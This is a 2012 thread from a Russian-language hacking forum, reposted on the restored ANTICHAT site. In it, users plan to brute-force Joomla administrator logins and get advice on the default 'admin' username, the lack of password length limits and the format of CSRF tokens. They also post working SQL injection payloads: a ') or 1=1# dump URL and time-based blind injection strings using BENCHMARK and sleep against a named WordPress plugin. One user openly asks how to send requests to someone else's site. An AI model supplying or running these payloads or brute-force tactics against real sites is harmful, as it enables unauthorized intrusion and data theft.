ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.12.2012, 18:07
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
хочу заняться брутом джумлы
есть словарик, но там даже 1 символьные пароли есть
есть ли у джумлы минимальная длина пасса?
логин - administrator стандартный?
|
|
|
01.12.2012, 19:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
1398
Репутация:
0
|
|
Есть скуля типа
При вводе урла типа
Код:
Code:
http://examle.com/search.php?q=')+or+1=1#
На выходе получаю дамп таблицы к которой(таблице) иеет доступ только админ сайта. Можно ли как то узнать версию mysql и имя бд? Спасибо. |
|
|
|
01.12.2012, 20:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от vaddd
vaddd said:
хочу заняться брутом джумлы
есть словарик, но там даже 1 символьные пароли есть
есть ли у джумлы минимальная длина пасса?
логин - administrator стандартный?
ограничений вроде как нет.
Дефолтный логин - admin
|
|
|
|
01.12.2012, 20:45
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от BigBear
BigBear said:
ограничений вроде как нет.
Дефолтный логин - admin
ну добавлю и admin и администратор)
т.е можно начинать со всех 1-2-3 символьных паролей брут?
|
|
|
|
01.12.2012, 22:48
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
на джумле везде токены есть?
|
|
|
|
02.12.2012, 12:17
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от vaddd
vaddd said:
ну добавлю и admin и администратор)
т.е можно начинать со всех 1-2-3 символьных паролей брут?
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.
Сообщение от None
на джумле везде токены есть?
Начиная с версии 1.5
|
|
|
|
02.12.2012, 23:09
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от BigBear
BigBear said:
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.
Начиная с версии 1.5
а у токенов всегда одинаковый формат?
или где-то будет по другому?
|
|
|
|
03.12.2012, 02:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от vaddd
vaddd said:
а у токенов всегда одинаковый формат?
или где-то будет по другому?
одинаковый. Вида мд5, 32 символа.
|
|
|
|
04.12.2012, 23:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
чем отправлять post запрос на сайт чужой?
|
|
|
|
09.12.2012, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db
Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20
Я запрашиваю:
1) http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20
2) http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
